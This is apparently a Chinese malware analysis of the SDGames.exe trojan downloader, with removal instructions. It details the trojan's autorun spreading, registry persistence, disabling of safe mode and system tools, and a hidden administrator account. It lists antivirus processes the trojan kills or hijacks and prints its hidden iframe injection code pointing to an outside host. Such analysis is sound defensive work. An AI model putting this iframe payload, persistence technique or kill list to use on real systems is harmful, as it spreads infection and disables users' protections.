在每个磁碟分区释放SDGames.exe和AUTORUN.INF 达到通过随身碟传播的目的
并且在每个分区释放Windows.url,新建资料夹·url,Recycleds.url指向该分区根目录下的SDGames.exe
基本介绍
- 中文名SDGames.exe
- 档案大小59282 byte
- 加壳方式北斗4.1
- 编写语言Microsoft Visual Basic
恶性病毒 SDGames.exe(小瓢虫)
档案名称称SDGames.exe
档案大小59282 byte
A V命名
Trojan.Win32.VB.yth(瑞星)
Trojan-Downloader.Win32.VB.lg(卡巴斯基)
Win32.Troj.Downloader.vb.237568(金山)
加壳方式北斗4.1
编写语言Microsoft Visual Basic 5.0 / 6.0
档案MD5fc334ffcf5aff3ca8235705d61f62990
主要表现为
1.攻击防毒软体之后进行IFEO映像劫持
2.感染htm等网页档案
3.感染或覆盖exe等执行档
4.破坏安全模式
5.破坏显示隐藏档案 资料夹选项等
6.修改系统时间并锁定时间
7.可通过随身碟等移动存储传播
8.关闭Windows防火墙等服务并打开许多危险服务,并使得用户磁碟被共享
9.后台添加账户并设定管理员许可权
10.修改某些档案关联
下面为具体分析
File: SDGames.exe
Size: 59282 bytes
File Version: 3.02
Modified: 2007年12月6日, 17:56:32
MD5: FC334FFCF5AFF3CA8235705D61F62990
SHA1: 4DFFE9E9BB666A13CC646EBA4371BDF4AFFB49BC
CRC32: 1DD096C2
1.病毒运行后,释放如下档案或副本
%systemroot%\system32\SDGames.exe
%systemroot%\system32\Taskeep.vbs
%systemroot%\system32\Avpser.cmd
%systemroot%\system32\netshare.cmd
%systemroot%\system32\AUTORUN.INF
在每个磁碟分区释放SDGames.exe和AUTORUN.INF 达到通过随身碟传播的目的
并且在每个分区释放Windows.url,新建资料夹.url,Recycleds.url指向该分区根目录下的SDGames.exe
诱使用户点击
2.修改reg和txt档案关联指向%systemroot%\system32\SDGames.exe
3.删除HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破坏安全模式
4.创建自启动项目
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><%systemroot%\system32\SDGames.exe> [SDGame]
<run><%systemroot%\system32\SDGames.exe> [SDGame]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Winstary><%systemroot%\system32\SDGames.exe> [SDGame]
5.破坏系统的一些功能
禁用cmd:HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD
破坏显示隐藏档案HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
使得档案扩展名无法显示HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
隐藏控制台
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
禁用注册表编辑器
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools
禁用任务管理器
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
修改IE主页为http://www..10mb.cn
修改IE默认页为wangma
隐藏资料夹选项
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
6.关闭如下服务并将其启动类型设为禁用
Alg
sharedaccess
wuauserv
7.开启下列服务并将其启动类型设为自动
Terminal Services
winmgmt
lanmanserver
8.%systemroot%\system32\netshare.cmd将用户的所有磁碟设为共享
9.添加一个名为guest的账户,并将其设定为管理员许可权
10.攻击反病毒软体,利用Avpser.cmd强制结束一些防毒软体进程
RavMonD.exe
RavStub.exe
Anti
AgentSvr
CCenter
Rsaupd
SmartUp
FileDsty
RegClean
360tray
360safe
kabaload
safelive
KASTask
kpFW32
kpFW32X
KvXP_1
KVMonXP_1
KvReport
KvXP
KVMonXP
nter
TrojDie
avp.com
KRepair.COM
Trojan
KvNative
Virus
Filewall
Kaspersky
JiangMin
RavMonD
RavStub
RavTask
adam
cSet
PFWliveUpdate
mmqczj
Trojanwall
Ras.exe
runiep.exe
avp.exe
PFW.exe
rising
ikaka
.duba
kingsoft
木马
社区
aswBoot
MainCon
Regs
AVP
Task
regedit
Ras
srgui
norton
avp
fire
spy
bullguard
PersFw
KAV
ZONEALARM
SAFEWEB
OUTPOST
ESAFE
clear
BLACKICE
360safe.exe
Shadowservice.exe
v3webnt.exe
v3sd32.exe
v3monsvc.exe
sysmonnt.exe
hkcmd.exe
DNTUS26.EXE
AhnSD.exe
CTFMON.EXE
MonsysNT.exe
awrem32.exe
WINAW32.EXE
PNTIOMON.exe
avgw.exe
avgcc32.exe
PROmon.exe
PNTIOMON.exe
MagicSet.exe
MainCon.exe
TrCleaner.exe
WmNetPro.exe
修复
保护
11.映像劫持防毒软体和一些常用工具
360rpt.exe
360Safe.exe
360tray.EXE
adam.exe
AgentSvr.exe
AppSvc32.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
FTCleanerShell.exe
HijackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
Knod32kui.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
KRepair.COM
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KVScan.kxp
KVSrvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KvXP_1.kxp
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
MainCon.exe
mcconsol.exe
mmqczj.exe
mmsk.exe
msconfig.exe
NAVSetup.exe
nod32krn.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
QQ.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
RegClean.exe
rfwcfg.exe
RfwMain.exe
rfwProxy.exe
rfwsrv.exe
Rsaupd.exe
runiep.exe
safelive.exe
scan32.exe
Shadowservice.exe
shcfg32.exe
SmartUp.exe
SREng.exe
srgui.exe
symlcsvc.exe
SysSafe.exe
TrojanDetector.exe
Trojanwall.exe
TrojDie.kxp
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.EXE.exe
WoptiClean.exe
zxsweep.exe
12.遍历感染非系统分区的exe档案(覆盖方式)
13.遍历感染非系统分区的jsp asp php htm html hta档案
在其末尾加入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://.10mb.cn/" name="Myframe"
align="center" border="0">的代码
14.修改系统时间的年份为2030年,并禁止用户修改时间
15.隐藏系统资料夹
解决办法
下载srenghttp://download.kztechs.com/files/sreng2.zip
Iceswordhttp://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip
1.解压缩Icesword
把Icesword改名为1.exe运行
进程中 找到SDGames.exe 右击它 结束进程
然后点击 Icesword左下角的 档案 按钮
找到如下档案并删除
%systemroot%\system32\SDGames.exe
%systemroot%\system32\Taskeep.vbs
%systemroot%\system32\Avpser.cmd
%systemroot%\system32\netshare.cmd
%systemroot%\system32\AUTORUN.INF
以及各个分区下面的
SDGames.exe,AUTORUN.INF,Windows.url,新建资料夹.url,Recycleds.url
2.运行sreng
(由于时间已经被改为2030年 所以sreng会弹出过期提示,不用担心,输入下面的授权码即可使用)
用户名teyqiu
授权号26129027541185431409013556
打开sreng后 点击 系统修复-档案关联-修复
系统修复-Windows Shell/IE -全选-修复
高级修复-修复安全模式
3.还是sreng中
启动项目 注册表 删除如下项目
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><%systemroot%\system32\SDGames.exe> [SDGame]
<run><%systemroot%\system32\SDGames.exe> [SDGame]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Winstary><%systemroot%\system32\SDGames.exe> [SDGame]
并删除所有红色的IFEO项目
启动项目 System.ini
删除Windows节点
4.取消磁碟共享
开始 运行 输入cmd 输入如下命令
net share c /delete
net share d /delete
...
以此类推 分别取消所有磁碟分区的共享
5.显示系统资料夹
开始 运行 输入cmd 输入如下命令
attrib -h %systemroot%\system32
6.修复受感染的htm等网页档案
推荐使用CSI的iframkill
下载地址http://www.vaid.cn/blog/read.php?9